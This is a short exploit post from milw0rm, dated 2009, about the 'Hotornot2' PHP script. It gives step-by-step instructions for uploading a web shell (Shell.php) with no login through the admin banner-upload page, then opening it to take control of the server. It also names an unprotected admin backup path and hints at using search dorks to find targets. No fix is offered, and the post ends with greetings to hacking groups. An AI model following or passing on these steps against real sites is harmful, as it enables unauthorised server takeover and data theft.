[+] Hotornot2 Script (Remote apload) Admin Bypass Vulnerability ===== ++ by sniper code++============================================ Author : sniper code ( S.C.T-443 ) website : www.sec-code.com =================================================================================================================== [+] ScRipT : http://www.ezonescripts.com/scripts/sls/hotornot2.php ==================================================================================================================== [+] Exploit: GO to : http://localhost/[path]/admin/sitebanners/upload_banners.php ( no need to registeration) you will see (Upload banners) ( browse and select file like example : Shell.php) and press upload ) you can press View banners button to see and ensoure your file uploaded ... then Go to : http://localhost/[path]/banners/Shell.php ( will view the shell ) [+] for bypassing admin backup : Go to : http://localhost/[path]/admin/backup dork : use ur mind ^_^ Thats it . . . =================================================================================================================== [+] Greetz to : [»] MN9 - AL-H7ano0ty - AB0 3thaB -snake1095 - rxh [»] JiKo, Crackerz child... [=]all members of tryag.cc + sec-code.com =================================================================================================================== # milw0rm.com [2009-05-26]